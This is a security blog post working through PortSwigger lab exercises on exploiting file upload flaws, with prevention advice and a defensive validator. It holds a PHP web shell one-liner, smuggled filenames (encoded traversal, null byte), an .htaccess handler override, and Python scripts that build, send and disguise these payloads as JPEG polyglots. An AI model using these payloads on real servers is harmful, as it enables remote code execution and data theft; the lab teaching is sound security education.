Methods For Exploiting File Upload Vulnerabilities

Ömer Faruk, PurpleBox Security
Published Jul 21, 2022 (8 min read)

This blog post was published on PurpleBox website on July 20th, 2022.

What Are File Upload Vulnerabilities?

Before we discuss how to exploit file upload vulnerabilities, it is important to understand what a file upload function is. A file upload function lets a user write a file into the web server's file system. It usually enforces some rules (for example, only JPG files are accepted). So what happens if we manage to upload a PHP file through an upload function that is only supposed to accept JPG files, and the server then executes it? This is where file upload vulnerabilities arise.

How Dangerous Are File Upload Vulnerabilities?

The impact of a file upload vulnerability depends on a few key factors.

  • If the website fails to properly validate the uploaded file's type and content, an attacker can upload a file containing server-side code (a web shell). If the server executes it, the attacker gains code execution on the server, which is the most dangerous outcome.
  • If the website fails to validate the uploaded file's name, an attacker can overwrite existing files by uploading a file with the same name. If the upload function is also vulnerable to directory traversal, the attacker can write outside the intended directory and overwrite files the application never expected to be writable (for example apache2.conf).
  • If the website fails to limit the uploaded file's size, an attacker can rapidly fill the available disk space. This is a form of denial-of-service (DoS) attack.

How To Exploit File Upload Vulnerabilities?

In this section, we walk through exploiting file upload vulnerabilities step by step with several examples.

The examples in this post are lab environments from the PortSwigger Web Security Academy.

1. Basic Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can then log in to your own account using the following credentials: wiener:peter.

Step #1: We are now logged in as user wiener and looking for the file upload function in the application.

Step #2: We have located a file upload function in the user’s profile.

Step #3: After locating the file upload function, we create a PHP file containing a one-line web shell that reads and prints the contents of /home/carlos/secret (shown in the screenshot in the original post), allowing us to view the secret of the user "Carlos".

Step #4: Now we can upload the PHP file that we created earlier.

Step #5: Now we need to make the web server execute this file. A GET request to the uploaded file's path is enough. The upload response reveals where the file was stored (/files/avatars/file_upload_test.php). Make the request, and the response contains the secret of the user "Carlos".

Step #6: Submit the flag and the lab is solved!

Note: We are not going to show the main application and lab solved page in the other sections.

2. Web Shell Upload via Content-Type Restriction Bypass

Condition: To solve this lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We found the same file upload function and tried to upload the same PHP file. This time the upload is rejected: the application checks the Content-Type of the uploaded file part.

Step #2: The error message tells us the application only allows the image/jpeg and image/png content types. The check, however, trusts the Content-Type header of the file part inside the multipart request body, which is entirely under our control. We changed it to image/jpeg and the file was successfully uploaded to the /avatars/file_upload.php endpoint.

Step #3: Let’s now make a GET request for the file that we uploaded before. Read the secret of the user “Carlos”.

3. Web Shell Upload via Directory Traversal

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: As in the previous examples, the first step is inspecting the file upload function. After inspecting it, we recognized that there is no restriction on uploading a PHP file to the server.

Step #2: But when we make a GET request to our uploaded PHP file, the server returns the contents of the PHP file as plain text: the /files/avatars directory is configured not to execute PHP, so the source is served rather than run.

Step #3: After trying some bypass techniques, we realized that we can escape the non-executing directory via directory traversal. A plain ../ in the filename is stripped by the server, but the URL-encoded form passes the check and is decoded when the file is written. We change the filename from file_upload_test.php to ..%2ffile_upload_test.php, and the upload response now shows that the file landed in the /files directory (the parent directory of /avatars), where PHP is executed.

Step #4: Now, a GET request to the /files/avatars/../file_upload_test.php endpoint returns the secret of the user "Carlos". The file can also be reached directly at /files/file_upload_test.php.

4. Web Shell Upload via Blacklisted Extension Bypass

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We use the same file upload function for the exploitation process. This time the upload is rejected with an error message in the HTTP response body saying that PHP files are not allowed: the application keeps a blacklist of forbidden extensions.

Step #2: After a few tries we found a way to bypass the blacklist. Here we reuse what we learned in the previous examples: the server is Apache and we can write into the avatars directory. First we upload a file named .htaccess whose content is AddType application/x-httpd-php .prplbx (the MIME type is conventionally written in lowercase). Apache reads per-directory .htaccess files when AllowOverride permits it, so this directive maps our made-up extension .prplbx to the PHP handler. The blacklist blocks .php, but it blocks neither .htaccess nor .prplbx.

Step #3: After this step, we can upload our PHP web shell with the .prplbx extension.

Step #4: Now we can access the secret of the user "Carlos" as before. The only difference is that this time we make a GET request to file_upload_test.prplbx instead of file_upload_test.php.

5. Web Shell Upload via Obfuscated File Extension

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We use the same file upload function for the exploitation process. The error message in the HTTP response body says that PHP files are not allowed and that only JPG and PNG files are accepted.

Step #2: After a few tries we found a successful method. We can obfuscate the filename: appending a null byte followed by an allowed extension, as in file_upload_test.php%00.jpg (URL-encoded form), bypasses the restriction. The validation code looks at the end of the name and sees .jpg, but when the name is passed to the underlying C-based filesystem routines the string ends at the null byte, so the file is written to disk as file_upload_test.php.

Step #3: Now we can access the secret of the user Carlos as usual.
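The uploads in labs 1 to 5 differ only in the filename and the Content-Type of the file part; everything else in the multipart request is the same. The following Python script, added here as an example and not code from the original post, builds the raw multipart/form-data body for each variant so the exact bytes sent to the server are visible and can be compared with what Burp Repeater shows. The form field names (avatar, user), the target URL and the session cookie are assumptions; the PHP web shell is the one-liner the labs call for.

```python
import urllib.request

# One-line PHP web shell that prints the lab's target file.
WEB_SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"

# Per-directory Apache override used in the blacklist-bypass lab: maps an
# arbitrary extension onto the PHP handler.
HTACCESS = b"AddType application/x-httpd-php .prplbx\n"

BOUNDARY = "----PurpleBoxBoundary7f2a"  # constructed; any unique string works

# (filename, part Content-Type, file bytes) for each technique in the post.
# Filenames are inserted verbatim, so %2f and %00 reach the server undecoded
# and are decoded by its own handling, exactly as when edited in Repeater.
ATTEMPTS = {
    "1_basic":        ("file_upload_test.php", "application/x-php", WEB_SHELL),
    "2_content_type": ("file_upload_test.php", "image/jpeg", WEB_SHELL),
    "3_traversal":    ("..%2ffile_upload_test.php", "image/jpeg", WEB_SHELL),
    "4a_htaccess":    (".htaccess", "text/plain", HTACCESS),
    "4b_custom_ext":  ("file_upload_test.prplbx", "image/jpeg", WEB_SHELL),
    "5_null_byte":    ("file_upload_test.php%00.jpg", "image/jpeg", WEB_SHELL),
}


def build_multipart(filename, content_type, data, field="avatar", extra=None):
    """Return (headers, body) for a multipart/form-data POST of one file part.

    `extra` holds ordinary form fields (for example {"user": "wiener"}) that
    the upload form may also require; field names are assumed.
    """
    parts = []
    for name, value in (extra or {}).items():
        parts.append(
            f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n".encode()
        )
    parts.append(
        (
            f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n"
        ).encode()
        + data
        + b"\r\n"
    )
    parts.append(f"--{BOUNDARY}--\r\n".encode())
    body = b"".join(parts)
    headers = {
        "Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def build_attempt(name, **kw):
    """Build the request for one ATTEMPTS entry by name."""
    filename, ctype, data = ATTEMPTS[name]
    return build_multipart(filename, ctype, data, **kw)


def send(url, headers, body, cookie):
    """POST the crafted body to an assumed URL with an assumed session cookie.

    Needs network access; nothing else in this file does.
    """
    req = urllib.request.Request(url, data=body, method="POST")
    for key, value in headers.items():
        req.add_header(key, value)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    # Print each crafted body to compare with what Burp would send.
    for attempt in ATTEMPTS:
        _, body = build_attempt(attempt, extra={"user": "wiener"})
        print(f"== {attempt} ==\n{body.decode(errors='replace')}")
    # To fire one at a lab instance (hypothetical URL and cookie):
    # print(send("https://LAB-ID.web-security-academy.net/my-account/avatar",
    #            *build_attempt("2_content_type", extra={"user": "wiener"}),
    #            cookie="session=..."))
```

After a successful upload, the GET request that triggers the shell is the path the upload response reports, as in the steps above; the script deliberately leaves the filename untouched so that the server, not the client, performs the percent-decoding that makes the traversal and null-byte variants work.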

6. Remote Code Execution via Polyglot Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We use the same file upload function for the exploitation process. The error message in the HTTP response body says that PHP files are not allowed and that only JPG and PNG files are accepted. This time the server also checks the file's content, not just its name, so the earlier tricks fail.

Step #2: We therefore build a polyglot: using ExifTool we embed a PHP payload in the metadata of a valid image (for example the JPEG comment field). The result is still a valid image and passes the content check, yet it contains executable PHP that the interpreter will run while ignoring the surrounding image bytes.

Step #3: We now upload the resulting file, saved with a .php extension so that the server executes it.

Step #4: Now we can access the secret of the user “Carlos” as usual.
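ExifTool writes the payload into the JPEG's COM (comment) segment; the lab is normally solved with a command of the form exiftool -Comment="<?php ... ?>" image.jpg -o polyglot.php. The Python below, added as an example and not code from the original post, does the same thing by hand and then walks the JPEG segment list to show that the result is still a structurally valid JPEG with the PHP sitting inside a comment. The input image is a constructed minimal JFIF file, not the one used in the lab.

```python
# Minimal JFIF file: SOI, one APP0 segment, EOI. Constructed for the example;
# any real JPEG works as input to inject_comment().
def minimal_jpeg() -> bytes:
    app0_data = (
        b"JFIF\x00"      # identifier
        + b"\x01\x01"    # version 1.1
        + b"\x00"        # density units: none
        + b"\x00\x01"    # X density
        + b"\x00\x01"    # Y density
        + b"\x00\x00"    # no thumbnail
    )
    app0 = b"\xff\xe0" + (len(app0_data) + 2).to_bytes(2, "big") + app0_data
    return b"\xff\xd8" + app0 + b"\xff\xd9"


PHP_PAYLOAD = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"


def inject_comment(jpeg: bytes, payload: bytes) -> bytes:
    """Insert a COM (0xFFFE) segment carrying `payload` right after SOI.

    Equivalent to `exiftool -Comment=<payload> in.jpg -o out.php`: image
    decoders skip COM segments, so the file stays a valid image, while the
    PHP interpreter ignores everything outside <?php ... ?>.
    """
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    if len(payload) + 2 > 0xFFFF:
        raise ValueError("payload too large for a single COM segment")
    com = b"\xff\xfe" + (len(payload) + 2).to_bytes(2, "big") + payload
    return jpeg[:2] + com + jpeg[2:]


def parse_segments(jpeg: bytes):
    """Return [(marker, payload)] for the marker segments up to SOS or EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    segs, pos = [], 2
    while pos + 2 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI, or SOS (entropy-coded data follows)
            segs.append((marker, b""))
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # standalone markers, no length
            pos += 2
            continue
        length = int.from_bytes(jpeg[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(jpeg):
            raise ValueError(f"bad segment length at offset {pos}")
        segs.append((marker, jpeg[pos + 4:pos + 2 + length]))
        pos += 2 + length
    return segs


def php_in_comments(jpeg: bytes) -> bool:
    """True if any COM segment contains a PHP open tag.

    This is what a magic-bytes-only check misses and what a content scanner
    on the defensive side would look for.
    """
    return any(m == 0xFE and b"<?php" in p for m, p in parse_segments(jpeg))


if __name__ == "__main__":
    polyglot = inject_comment(minimal_jpeg(), PHP_PAYLOAD)
    with open("polyglot.php", "wb") as f:   # upload this with the .php extension
        f.write(polyglot)
    for marker, payload in parse_segments(polyglot):
        print(f"FF{marker:02X} {len(payload):5d} bytes {payload[:40]!r}")
```

Placing the comment directly after SOI is valid JPEG (COM may appear anywhere before SOS); ExifTool places it after the APP segments instead, which decoders treat the same way.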

How To Prevent File Upload Vulnerabilities?

The most effective approach is to implement all of the following practices together:

  • Compare the file extension against a whitelist of allowed extensions rather than a blacklist of prohibited ones. It is much easier to enumerate the extensions you want to allow than the ones an attacker might try.
  • Check the file's content (for example its magic bytes) and do not trust the client-supplied Content-Type header.
  • Make sure the filename does not contain any substrings that may be interpreted as a directory or traversal sequence (../), including URL-encoded forms and null bytes.
  • Rename uploaded files to avoid collisions that could cause existing files to be overwritten.
  • Do not write files to the server's filesystem until they have been fully validated, and store them outside the web root or in a directory where the web server does not execute scripts.
  • Whenever possible, use an established framework for preprocessing file uploads rather than writing your own validation mechanism.
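As an added example (not code from the original post), the following Python validator applies these rules to the same upload attempts that defeated the labs above. The allowed-extension list, size limit, filename pattern and upload directory are assumptions for the example.

```python
import os
import re
import secrets
import urllib.parse

# extension -> (served MIME type, magic-byte prefix); assumed allow-list
ALLOWED = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
}
MAX_BYTES = 2 * 1024 * 1024          # assumed size limit
UPLOAD_DIR = "/var/www/uploads"      # assumed: outside the document root, no script execution
# exactly one dot, so ".htaccess" and "a.php.jpg" never match
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,5}$")


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, data: bytes) -> str:
    """Return a safe, server-chosen filename or raise UploadRejected.

    The client-supplied Content-Type is deliberately not a parameter: it is
    attacker-controlled (lab 2) and carries nothing worth trusting.
    """
    # Decode once so %2f and %00 tricks are judged on what the server would see.
    name = urllib.parse.unquote(filename)
    if "\x00" in name or "/" in name or "\\" in name or ".." in name:
        raise UploadRejected("path separator, traversal or NUL in filename")
    if not _NAME_RE.fullmatch(name):
        raise UploadRejected("filename does not match the allowed pattern")
    ext = name.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected(f"extension .{ext} is not allowed")
    if not 0 < len(data) <= MAX_BYTES:
        raise UploadRejected("empty or oversized file")
    _, magic = ALLOWED[ext]
    if not data.startswith(magic):
        raise UploadRejected("content does not match the declared image type")
    # Rename: the stored name never derives from user input, so there are no
    # collisions and nothing existing can be overwritten.
    return f"{secrets.token_hex(16)}.{ext}"


def storage_path(stored_name: str, upload_dir: str = UPLOAD_DIR) -> str:
    """Join and re-check that the final path stays inside upload_dir."""
    root = os.path.realpath(upload_dir)
    path = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, path]) != root:
        raise UploadRejected("resolved path escapes the upload directory")
    return path


def try_upload(filename: str, data: bytes):
    """Return ('ok', stored_name) or ('rejected', reason) for one sample."""
    try:
        return "ok", validate_upload(filename, data)
    except UploadRejected as exc:
        return "rejected", str(exc)


# Constructed samples mirroring the lab payloads.
SHELL = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"
SAMPLES = [
    ("file_upload_test.php", SHELL),                               # labs 1/2
    ("..%2ffile_upload_test.php", SHELL),                          # lab 3
    (".htaccess", b"AddType application/x-httpd-php .prplbx\n"),   # lab 4
    ("file_upload_test.prplbx", SHELL),                            # lab 4
    ("file_upload_test.php%00.jpg", SHELL),                        # lab 5
    ("avatar.jpg", SHELL),                                         # wrong magic bytes
    ("avatar.jpg", JPEG),                                          # legitimate image
]

if __name__ == "__main__":
    for fname, blob in SAMPLES:
        print(f"{fname!r:36} -> {try_upload(fname, blob)}")
```

A polyglot image (lab 6) still passes this validator, because it is a genuine JPEG; that is why the stored file must live where the server will never execute it and be served with a fixed image Content-Type. Re-encoding accepted images through an image library, which discards metadata, is an additional measure.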

Conclusion

In this blog post, we talked about what file upload vulnerabilities are and their potential damage to systems. We have also explained methods for exploiting file upload vulnerabilities and ways to prevent file upload vulnerabilities.

We hope you found our blog post useful and it will help you to make secure file uploads in the future. Don’t forget to check out our Penetration Testing services to stay secure!

If you want to read more on this topic, feel free to check out the PurpleBox Blog Section.
